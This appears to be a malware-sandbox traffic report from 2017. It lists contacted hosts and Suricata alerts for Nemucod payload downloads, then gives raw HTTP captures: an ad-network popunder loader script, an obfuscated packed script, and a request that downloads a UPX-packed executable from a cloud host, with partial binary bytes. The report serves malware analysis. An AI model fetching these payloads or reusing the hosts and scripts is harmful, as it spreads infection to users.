hxxp://msg.71.am/core?t=15&ptid=11&pf=1&p=10&p1=101&c1=10&r=572044000&aid=204432001&u=5088e17771f6d54476f95dc61f9e80b4&pu=&v=3.3.12.9&ra=2&as=048c93b654d2bd4a3e9c933afb514399&qdv=2&ce=11d91127a84babbf6dabdf9e702b5f03&ve=0418909173dcc97c13d68d5c2ee32172&vfrm=&vfrmtp=manclick&sdktp=1&hu=&ht=0&mod=cn_s&islocal=0&rfr=&lrfr=DIRECT&rn=0.6126211592927575	106.38.219.49
hxxp://msg.71.am/cp2.gif?x=http://www.iqiyi.com/common/flashplayer/20170119/1050f98c2359.swf\|\|http://www.iqiyi.com/common/flashplayer/20170119/036300cf212b7b.swf&p=v&lc=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&s=1484906112396&t=s&b=0&c=0&v=572044000&av=AdManager 3.63.0&fp=WIN 23,0,0,185&e=98f3f08439c68c9b57b3520f0696fb2c&vv=5.3.2.47&y=qc_100001_100226&pl=0	106.38.219.49
hxxp://atanx2.alicdn.com/g/mm/tanx-cdn2/t/tanxssp.js?_v=12	195.27.31.250
hxxp://cpro.baidu.com/cpro/ui/html/sync.htm?sid=&p=iqiyi&t=1484906112271	115.239.217.134
hxxp://data.video.qiyi.com/crossdomain.xml	222.173.57.193
hxxp://msg.video.qiyi.com/vodpb.gif?type=piaoshhtestmayttf&des=h5p2ptest&brs=mozilla%2F4.0%20(compatible%3B%20msie%207.0%3B%20windows%20nt%205.1%3B%20trident%2F4.0%3B%20sv1%3B%20gtb7.3%3B%20u9dnfsh)%20qqbrowser%2F6.14.15493.201&mse=0&p2p=0&p=pc&_=1484906111480	36.110.220.15
hxxp://msg.71.am/vpb.gif?flag=plyract&plyract=svrs&aid=&tvid=572044000&vid=787ab6983c8a883fa3c5190ce3cac804&cid=&lev=&puid=&pru=&veid=0418909173dcc97c13d68d5c2ee32172&weid=&newusr=1&pla=11&visits=&sttntp=0&plyrtp=0&plyrver=3.3.12.9&z=&suid=&diaoduuip=&plid=572044000&vvfrom=lianbo&vfrm=&vfm=&restp=&ispur=&as=b7ec007eeb7742d5c4f169def66e0c67&qdv=2&isdm=0&isstar=0&hu=&mod=cn_s&videotp=0&tn=0.11122033419087529	106.38.219.49
hxxp://hm.baidu.com/hm.js?53b7374a63c37483e5dd97d78d9bb36e	220.181.7.190
hxxp://www.iqiyi.com/common/flashplayer/20170118/10382a1b82aa.swf
hxxp://static.iqiyi.com/ext/common/Tipdatavod_201610311735.xml?n=0.2173128924332559
hxxp://pixel.quantserve.com/pixel;r=995029119;a=p-pV8razYeGyZwj;fpan=0;fpa=P0-1340228538-1484906118834;ns=1;ce=1;cm=;je=1;sr=1366x768x24;enc=n;dst=1;et=1484906135298;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show.php?a=MNKKAJHPC2F4X&b=8KUVPZMBBAG6V;ogl=	95.172.94.59
hxxp://msg.video.qiyi.com/vodpb.gif?type=piaoshhtestmayttf&des=h5p2ptest&brs=mozilla%2F4.0%20(compatible%3B%20msie%207.0%3B%20windows%20nt%205.1%3B%20trident%2F4.0%3B%20sv1%3B%20gtb7.3%3B%20u9dnfsh)%20qqbrowser%2F6.14.15493.201&mse=0&p2p=0&p=pc&_=1484906109847	36.110.220.15
hxxp://hm.baidu.com/hm.gif?cc=0&ck=1&cl=24-bit&ds=1440x900&ep={"netAll":1466,"netDns":1383,"netTcp":79,"srv":583,"dom":2056,"loadEvent":6899,"qid":"","bdDom":0,"bdRun":0,"bdDef":0}&et=87&fl=23.0&ja=1&ln=en-us&lo=0&nv=1&rnd=2074899456&si=53b7374a63c37483e5dd97d78d9bb36e&st=1&v=1.2.11&lv=1	220.181.7.190
hxxp://static.geetest.com/static/js/geetest.5.10.0.js	198.11.176.80
hxxp://p.tanx.com/ex?i=mm_26632162_2469125_22350506	106.11.93.16
hxxp://msg.71.am/cp2.gif?s=1484906112427&t=s&av=3.12.0&e=98f3f08439c68c9b57b3520f0696fb2c&vv=5.3.2.47&rd=1509&y=qc_100001_100226&p=pl&rc=1	106.38.219.49
hxxp://msg.iqiyi.com/vpb.gif?flag=rptusr&newusr=1&suid=5088e17771f6d54476f95dc61f9e80b4&tn=0.5403782017529011	106.38.219.49
hxxp://meta.video.qiyi.com/crossdomain.xml	2.21.89.89
hxxp://passport.pps.tv/pages/user/proxy.action	123.125.111.87
api.share.baidu.com	61.135.162.115
googleads.g.doubleclick.net	173.194.113.218
ap1.sap1000.com	61.153.110.5

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN JS/Nemucod requesting EXE payload 2016-02-01
ET POLICY Unsupported/Fake Windows NT Version 5.0
ET POLICY PE EXE or DLL Windows file download HTTP
ET TROJAN JS/Nemucod.M.gen downloading EXE payload
ET POLICY HTTP Request on Unusual Port Possibly Hostile
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /pupfurt.js HTTP/1.1

Accept: */*

Referer: hXXp://zooxxxfree.com/

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: hitslap.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:05 GMT

Server: Apache/2.4.10 (Debian)

Last-Modified: Mon, 10 Nov 2014 19:45:40 GMT

ETag: "17e2-5078668464100-gzip"

Accept-Ranges: bytes

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Length: 1893

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: application/javascript
...........X.o.6..._.....U..b.N.....@?...V.A@K..E.5.r.4..wGR...IZ.a...
...x.....U.k!sZT..l.uoo....<{..|.\........Y.$`erH...Rzo..A..s...D..
.=..f9...~..z#..dN.1...LJE..Wk...e...E&4].....b....'n28...d...&1...P."
..i.u.r..gs.vuE.2.h..!.R@.y0...S..z.{..9eHDH....T..DJ(.x.d.6.hE.'.....
.y..2V2.A9..2.$h."...LW%......&.Kq....O.s...<..E..G.D..k.!.....6ke.
..r..e..7...Ta.z2P.9|.*.<sc.`.G.`ey......lt....!)...2...g.y8H....."
*.F....{BK.........e=cz./..7.....O.i..p..8.f..KO.a*.....*...!...(.....
x.1.L....r..!Y...%.;3.....,I~...[Qj.sE..^.A....de!y...<Z.Y.2.4.yC8.
.....DE..R.,...qU.\..K\p..g...f\D).0....C..3.|q&4Nl.......s0Yiz{...Jv/
*$S.....o.eGEtO.*?P...3....../Zx....L..._.vPD.tCW.\...Cp.............9
$L....z...,|.)......B..N.t;|6...^DAVp....Ol.U....lM..X..H.V"K..u.z>
....w.*.s..!.z#t..F..).M.[nb....!qd...,.;.Q"....r..\......G.......k..&
gt;...T=.N......).F.........Ai..$.d23<..5........X....R.t..`s\...yT
...........{i..:.{k..4W..&E...v.4.m....mg...d.gc.Z>..q&.2.j.e..(.9O
.m..o.Y..........L..^.nf.[f.5....5..k>y.??N..8...IJ......e.G..d....
.m..W...'..NO..I.d......9..%.RE.(...]P.....#.1}...w.#...gdl.......8. .
.Rd..r...cl<..X.!.... .pt..x....C.p.|.*(...$CRV....l...t.}.R.......
{)l...].n"...q.\G..J.......8...3..G...L........./Itr0.....O.!.......5.
R.J.[.A.l.%u9z.....b~..{p...z..P.ko6y-/n.k.......}/4.....,'P....#S.<
;...*SD'A;....V"Ix......7.v...Wq.V.ge.t,.W......~...!f_d..g.N.T*B.L.-.
 ..vH..R.`....E...8A.=.h.`"0.g.......R)LY.<.A.=._S.:9 p..{e.I...pw.
o.et.Q.{.i.r..~S...|.4r`..:..S.i...6.j. .....F......]*.?q....C....<<< skipped >>>

GET /js/?wkey=10E7Cr HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: apps.cointraffic.io

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:18 GMT

Content-Type: application/javascript

Transfer-Encoding: chunked

Connection: keep-alive
1b0../* Cointraffic.io */..(function () {..var ct_load = function(){..
var ct_script = document.createElement('script');..ct_script.type = "t
ext/javascript";..ct_script.src = "//apps.cointraffic.io/bnr?wkey=10E7
Cr";..document.getElementsByTagName('head')[0].appendChild(ct_script);
..};..if (window.addEventListener) {..window.addEventListener('load', 
ct_load, false);..} else {..window.attachEvent('onload', ct_load)..}..
}());..        ..0..HTTP/1.1 200 OK..Server: nginx..Date: Fri, 20 Jan 
2017 09:55:18 GMT..Content-Type: application/javascript..Transfer-Enco
ding: chunked..Connection: keep-alive..1b0../* Cointraffic.io */..(fun
ction () {..var ct_load = function(){..var ct_script = document.create
Element('script');..ct_script.type = "text/javascript";..ct_script.src
 = "//apps.cointraffic.io/bnr?wkey=10E7Cr";..document.getElementsByTag
Name('head')[0].appendChild(ct_script);..};..if (window.addEventListen
er) {..window.addEventListener('load', ct_load, false);..} else {..win
dow.attachEvent('onload', ct_load)..}..}());..        ..0......


GET /bnr?wkey=10E7Cr HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: apps.cointraffic.io

Connection: Keep-Alive


HTTP/1.1 301 Moved Permanently

Server: nginx

Date: Fri, 20 Jan 2017 09:55:23 GMT

Content-Type: text/html

Content-Length: 178

Location: hXXp://apps.cointraffic.io/bnr/?wkey=10E7Cr

Connection: keep-alive
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1&
gt;301 Moved Permanently</h1></center>..<hr><cent
er>nginx</center>..</body>..</html>......


GET /bnr/?wkey=10E7Cr HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: apps.cointraffic.io

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:23 GMT

Content-Type: text/javascript;charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive
cf6../* 4 not allowed for this device */ ../* Cointraffic.io | Load Po
punder */..var scr_js = document.createElement('script');..scr_js.src 
= "//app.cointraffic.in/js/pnd2/script.packed.js";..document.getElemen
tsByTagName('head')[0].appendChild(scr_js);..setTimeout(function() {..
function get_f_popuner() {..var rurl = '//apps.cointraffic.io/clkrd/?b
id=600';..BetterJsPop.add( rurl , {..noReferer: true,..newTab: true,..
under: false,..device: 'desktop',..cookieExpires: 1800,..afterOpen: fu
nction(url, options, popWin) {..load_cr_34BWiR();..}}); function load_
cr_34BWiR() {..var css_copyright = document.createElement('link');..cs
s_copyright.rel = "stylesheet";..css_copyright.type = "text/css";..css
_copyright.href = "//apps.cointraffic.io/css_cr/ppunder/?key=34BWiR&b=
600";..document.getElementsByTagName('head')[0].appendChild(css_copyri
ght);..}} window.onload = get_f_popuner(); }, 1000);../* Cointraffic.i
o | Load Slide */..if(typeof(Storage) !== "undefined") {..    if (sess
ionStorage.ct_ss_chk_zGLVXy) {..        sessionStorage.ct_ss_chk_zGLVX
y = Number(sessionStorage.ct_ss_chk_zGLVXy)   1;..    } else {..      
  var css_zGLVXy = document.createElement('link');..        css_zGLVXy
.rel = "stylesheet";..        css_zGLVXy.type = "text/css";..        c
ss_zGLVXy.href = "//apps.cointraffic.io/css/slide/?key=zGLVXy";..     
   document.getElementsByTagName('head')[0].appendChild(css_zGLVXy);..
        // document.body.innerHTML  = '<span id="ct_zGLVXy"><
/span>';....        var btn = document.createElement('span');..<<< skipped >>>

GET /css/slide/?key=zGLVXy HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: apps.cointraffic.io

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:23 GMT

Content-Type: text/css;charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive
51e..@-webkit-keyframes bounce {..    0%, 20%, 50%, 80%, 100% {-webkit
-transform: translateY(0);}..    40% {-webkit-transform: translateY(-3
0px);}..    60% {-webkit-transform: translateY(-15px);}..}..@keyframes
 bounce {..    0%, 20%, 50%, 80%, 100% {transform: translateY(0);}..  
  40% {transform: translateY(-30px);}..    60% {transform: translateY(
-15px);}..}...ct_zGLVXyl {..    position: fixed;..    left:0;..    bot
tom:0;..    display: block;..    z-index: 9999;..}...ct_zGLVXyr {..   
 position: fixed;..    right:0;..    bottom:0;..    display: block;.. 
   z-index: 999;..}...ct_zGLVXyl .ct_zGLVXycrs {..    display: block;.
.    position: absolute;..    right: -20px;..    top: -20px;..    heig
ht: 20px;..    width: 20px;..}...ct_zGLVXyr .ct_zGLVXycrs {..    displ
ay: block;..    position: absolute;..    left: -20px;..    top: -20px;
..    height: 20px;..    width: 20px;..}...ct_zGLVXyr .ct_zGLVXycrs im
g {..    height: 20px;..    width: 20px;..}...ct_zGLVXycrs:hover {..  
  cursor: pointer;..}...ct_zGLVXybnc {..    -webkit-animation-duration
: 1s;..    animation-duration: 1s;..    -webkit-animation-fill-mode: b
oth;..    animation-fill-mode: both;..    -webkit-animation-timing-fun
ction: linear;..    animation-timing-function: linear;..    -webkit-an
imation-name: bounce;..    animation-name: bounce;..}..0......


GET /css_cr/slide/?key=zGLVXy&b=601 HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: apps.cointraffic.io

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:25 GMT

Content-Type: text/css;charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive
478...ct_zGLVXylg {..    position: absolute;..    top: 0;..    right: 
0;..    height: 15px;..    width: 15px;..    display: block !important
;..    z-index: 9999;..}...ct_zGLVXylg img.ct_zGLVXyimg {..    positio
n: absolute;..    top: 0;..    right: 0;..    margin: 0;..    padding:
 0;..}...ct_zGLVXytx {..    visibility: hidden;..    opacity: 0;..    
transition: visibility 0s, opacity 0.5s linear;..    color: #000 !impo
rtant;..    font-family: Verdana;..    background: #fff !important;.. 
   font-size:10px !important;..    position:absolute !important;..    
top: 0 !important;..    right: 15px !important;..    width: 110px !imp
ortant;..    text-align: center;..    height: 15px !important;..    li
ne-height: 14px !important;..    padding: 0 !important;..    -webkit-t
ransition: all 0.5s ease;..    -moz-transition: all 0.5s ease;..    -o
-transition: all 0.5s ease;..}...ct_zGLVXytx a.ct_zGLVXylnk {..    lin
e-height: 14px !important;..    font-size:10px !important;..    font-f
amily: Verdana;..    color: #000 !important;..    text-decoration: non
e !important;..}...ct_zGLVXylg:hover .ct_zGLVXytx {..    visibility: v
isible;..    opacity: 1;..}..0..HTTP/1.1 200 OK..Server: nginx..Date: 
Fri, 20 Jan 2017 09:55:25 GMT..Content-Type: text/css;charset=UTF-8..T
ransfer-Encoding: chunked..Connection: keep-alive..478...ct_zGLVXylg {
..    position: absolute;..    top: 0;..    right: 0;..    height: 15p
x;..    width: 15px;..    display: block !important;..    z-index: 999
9;..}...ct_zGLVXylg img.ct_zGLVXyimg {..    position: absolute;.. <<< skipped >>>

GET /m?if=defaultQuery&response_type=2&platform=14&is_qipu_platform=1&u=5088e17771f6d54476f95dc61f9e80b4&pu=&callback=window.Q.__callbacks__.cbtskh2b HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: search.video.qiyi.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Tengine

Date: Fri, 20 Jan 2017 09:55:16 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 372

Connection: keep-alive

Access-Control-Allow-Credentials: true
try{window.Q.__callbacks__.cbtskh2b({.    "data": [.        {.        
    "query": "..................... ...2...",.            "impression_
count": 12062,.            "click_count": 15055,.            "url": "h
ttp://so.iqiyi.com/so/q_..................... ...2...",.            "s
earch_trend": 1,.            "weight": 1.        }.    ],.    "code": 
"A00000".})}catch(e){}HTTP/1.1 200 OK..Server: Tengine..Date: Fri, 20 
Jan 2017 09:55:16 GMT..Content-Type: text/html; charset=utf-8..Content
-Length: 372..Connection: keep-alive..Access-Control-Allow-Credentials
: true..try{window.Q.__callbacks__.cbtskh2b({.    "data": [.        {.
            "query": "..................... ...2...",.            "imp
ression_count": 12062,.            "click_count": 15055,.            "
url": "hXXp://so.iqiyi.com/so/q_..................... ...2...",.      
      "search_trend": 1,.            "weight": 1.        }.    ],.    
"code": "A00000".})}catch(e){}..

GET /dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_he05GuFArQbiUANdeAtwYBETZptE4eVTuj1sbd2fuD3zywAAso39i17ndkUX3xBZAppZQQWvRmRlGgOfySA424aa6BXXOxY_96R7SqErsW-Nq8vNLEaVPrymNi0G5oKfCmisXgdZiIakTaQmegvalckrYP1qxFqULtgSPtgy9qqYBL8cHKJOXYmPRoO7vKUq7auJsgnlUAZmL6MNrhftmmV5yInUlT-maxeLnWdP0dbIPjg8LRZPcDjf0KTChgJ5lPqf68rDJ_3ONy0cVlrH0PpbjyTzIyN4b9wp3X2kV3ceuB38qWchaGJkSsMVD0xh4AlXLlHMgqTN9C-WhoSPtt34CKnncVVnPw2MI9C6CZNXfh7rPuP3RGKCgPUpCbI2HU&v=404&seq=9 HTTP/1.1

Accept: */*

Referer: hXXp://x.jd.com/exsites?spread_type=2&ad_ids=198:5&location_info=0&callback=getjjsku_callback

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: im-x.jd.com

Connection: Keep-Alive

Cookie: __jda=.238043269.1484906111.1484906111.1484906111.0


HTTP/1.1 200 OK

Server: openresty

Date: Fri, 20 Jan 2017 09:55:14 GMT

Content-Type: image/gif

Transfer-Encoding: chunked

Connection: close

Expires: Fri, 20 Jan 2017 09:55:13 GMT

Cache-Control: no-cache

0..

GET /ics?a=194.242.96.218&b=9b9366963d49845dcaef1cf22d487ad8 HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: 101.227.188.34

Connection: Keep-Alive


HTTP/1.1 204 No Content

Server: nginx/1.4.2

Date: Fri, 20 Jan 2017 09:55:15 GMT

Connection: keep-alive

HTTP/1.1 204 No Content..Server: nginx/1.4.2..Date: Fri, 20 Jan 2017 0
9:55:15 GMT..Connection: keep-alive..

GET /date/11.exe HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: update-10042197.cos.myqcloud.com

Cache-Control: no-cache


HTTP/1.1 200 OK

Content-Range: bytes 0-370175/370176

Content-Type: application/octet-stream

Content-Disposition: attachment; filename*="UTF-8''11.exe"

Content-Language: zh-CN

ETag: 9eb7e6738239615838c9e6d786336d13

Accept-Ranges: bytes

Last-Modified: Wed, 07 Dec 2016 20:26:00 GMT

Content-Length: 370176

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......)...mio.mio.
mio.....hio..'..lio.v...qio.d...`io.d...Fio.min.:ho.v....io.v....io.v.
..lio.mi..lio.v...lio.Richmio.........PE..L...$N.W....................
. ......`........ ....@..........................@............@.......
...........................7....... ......................T<.......
......................................................................
.........UPX0....................................UPX1.................
...............@....rsrc.... ... ......................@..............
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..........3.91.UPX!....B..noNCm....[....:..&>.=....U...E...h......P
.>..../......t,...t ..t."t.P....t.h.@......hW.....h...].....n.u....
....H.....z..=.r.m.]1....R..u.(VP....._....t(?\.M......v.;.s.I....o...
tV.u..r.3... .....#.^..{.......@*.j.P..k....%..._..6.RePj.d...BSVW...H
@j....~.|...3.C..gWR..|.....S?C...6._^[~........p.}..v......M...@'....
w.D.A........J........Q...R.o..._D..h..i....Y@P.JL...]....W..@.\fV....
!..[.....t.V...Y.l........x...;B....B...3.f......A?.......si.........c
9..E=.r..O...kQQ..1.^..M....~.N..W.]..Pp.j.l......u....B;.}.......

<<< skipped >>>

GET /ads?spot_id=2007013&rand=1853651284&impid=55_1484906106204537_27019&uuid=b3da0bc7-5356-4cf4-8cd7-941025e2cf15 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://ads.trafficjunky.net/ads?zone_id=1343931&ref=pornvideo-box.com&pid=1c7fd951-6162-4776-b70b-13bb84f94bba&ts=1484906106

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: ads2.contentabc.com

Connection: Keep-Alive

Cookie: adtools_fc=siteAllocID_266580_expires_1484906106|


HTTP/1.1 200 OK

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Date: Fri, 20 Jan 2017 04:55:06 GMT

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: GET,POST

Access-Control-Allow-Headers: Content-Type

Access-Control-Max-Age: 86400

Cache-Control: private, no-cache, no-cache, proxy-revalidate

Set-Cookie: adtools_fc=siteAllocID_266580_expires_1484906106|; expires=Sun Feb 19 04:55:06 201

Server: Logger/0.1

Content-Encoding: gzip
2f1.............T]..6.. n*.V*$v.H [....m...}.Ll...v..,..w..../........
....;.;w3..n.....){...Q.....5...W..q..a......&y..hw>Y}Ql.i.m..O.g..
jOB......P..%[`a..u..c...../Z9*.......;7.U(..km....w..ql..Yz<......
....6....V....(H.n.................6._...la.f..x)M..-...........u..XH.
|.........E...E./......(Y..22...$.H......(.(........%%.....v...1...`E.
.f.$..z..U..7.......K\.....p.|$ ..s:..=iI..<.^.s.4..$......^{}.A...
@..,......>....k.9o_>=.@,h.fx..E..&.Uy..kVK1.(]..8.dUR.. I..eK..
WKj..j...zh!.u~.q..{.].s}..$1.[.sq.].H..F....jd..N..-..v.mj.P..-.o....
....quo.......Q........w(...... .Y......vb8..vM.[j......).&p.-..|c....
=...;..NJ..#5e...^.u........P........Hz..P.n.. uw..b.'.{...7......Hjm@
.....8......H.-.....`....4O.8...M.BEs.....G..[)_.8...-............u...
.....0..

GET /ads?spot_id=2007013&rand=1853651284&impid=50_1484906106729452_21376&uuid=b3da0bc7-5356-4cf4-8cd7-941025e2cf15 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://ads.trafficjunky.net/ads?zone_id=1344051&ref=freemomboy.com&pid=60e5644c-fd9a-44a6-a46b-49c04e3effcd&ts=1484906106

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: ads2.contentabc.com

Connection: Keep-Alive

Cookie: adtools_fc=siteAllocID_266580_expires_1484906106|


HTTP/1.1 200 OK

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Date: Fri, 20 Jan 2017 04:55:06 GMT

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: GET,POST

Access-Control-Allow-Headers: Content-Type

Access-Control-Max-Age: 86400

Cache-Control: private, no-cache, no-cache, proxy-revalidate

Set-Cookie: adtools_fc=siteAllocID_266580_expires_1484906106|; expires=Sun Feb 19 04:55:06 201

Server: Logger/0.1

Content-Encoding: gzip
2f2.............Tm..8.. .T.=. ..F.....E...:.....xIl.1.........R..B.x..
.3....Tc.......fzr..7=..5-5..Up...*......)vE..v..v.9..:I.hT.L..D..F=5.
!.h.4eL.C..5.0qFMG.....q.NIK..&@J6.h.Up....Ri......2..]ZC.{.<......
.V...SV.Ve.d.....yR.......m...e.qs..$.&.m.....NW..,~.....\.Ks\6..EG...
.......7.?P6..9!E....%3.QFF......=.......%..tr.S..(..P<...c.0.Y..,.
..l..p[.x....*wP<...m...........D.c....#......k[....]....p...V... k
z.k;........_.............v`.Wi.....W.'..j1.....Q..URD.....IJj..<.S
.......].1.........".mK.G.~Y...CkKDR..j.V(Y".;j...Qs2.kS......:s....D.
`..[.N........,pX..........}]@....<...........R.4..u.0......w.k...!
4..2x...Q...;E.?...Z..[...np%.....5bb....H..n.b....j..N...~.o..'H..Q..
.).P.w.|...g."....}L..N..&.4!B..RW...L...P..6.Z)W..................V..
......0..

GET /ex?i=mm_26632162_2469125_22350506 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: p.tanx.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:09 GMT

Content-Type: application/x-javascript; charset=gbk

Transfer-Encoding: chunked

Connection: close

Server: Tengine

Vary: Accept-Encoding

Expires: Fri, 20 Jan 2017 09:55:08 GMT

Cache-Control: no-cache

Content-Encoding: gzip

Timing-Allow-Origin: *
1c6............].M..0.@...t.."8.,.%...]..*8t.V....!.:vd;."....=.^F3...
.....sB ..J||......B.l..d...l..M>..x.e.q2N&.1*...?S.....2d:.*....P.
.8.^...D...5.$..>M.;....K.....4=Gm.....[..3...0..@.v.4x3B.`...x.7M.
...._...txA...f....[!y|u.`mK..l.R.........\ThO....6?.....M.4..w.Q.7.\|
_>|)..N..:..I..:\.....{.......Jt.eH.0@....O....EI.....~....:.Q]....
.Dw..p.5.%.U..-a55...:W.?.'... .'>...m^...R..W.pd..T.X.....g.-?.do.
.....~.?o/..?h.}...:b......g..B...9..0,....;..@......0..

GET /crossdomain.xml HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: irs01.com

Connection: Keep-Alive

Cookie: _iwt_id=qrIman_egVifaJSxR1USTgA


HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:14 GMT

Content-Type: text/xml; charset=utf-8

Content-Length: 165

Last-Modified: Thu, 19 Nov 2015 03:19:21 GMT

Connection: close

Vary: Accept-Encoding

ETag: "564d3fb9-a5"

Content-Encoding: gzip

Expires: Fri, 27 Jan 2017 09:55:14 GMT

Cache-Control: max-age=604800
.....?MV..crossdomain.xml.m....0.E....f)..}b.%$#.H25._.oJ.H.]..... '..
.X......e...Jk.%{.8K......X......L5.*E..L..O..5.S..C..^.d....`~.Iu.J.;
5..|..6../{................

GET /js/pnd2/script.packed.js HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: app.cointraffic.in

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:23 GMT

Content-Type: application/javascript

Content-Length: 65792

Last-Modified: Wed, 30 Nov 2016 10:06:34 GMT

Connection: keep-alive

ETag: "583ea4aa-10100"

Accept-Ranges: bytes
var Bwda={t5:function(x,y){return x<y;},L5:function(){return{b:func
tion(e){var a='',d=decodeURIComponent("%/A#j'$6Am8',"~%
2303'E6n$( Q-'}""Z15{huK>~ 0Il2?2&1-=%6
0}<,})+\%8'?22-=`X!./oA+< o;a%2
B=6.;A<,},K>~?23./o*m-=`w0?$2+Gl9 
'[7(-=`v<,})/F
'=%3
CZ25!57K>~u?22-=`G'=<7+v*9?%0Il6:3+K>~%1
13!B15!o'F?27>7$~?2 <<"%K%3
E~3!B15!o'F8!.#P<,}/0Il>66T ./ozl`}s%7
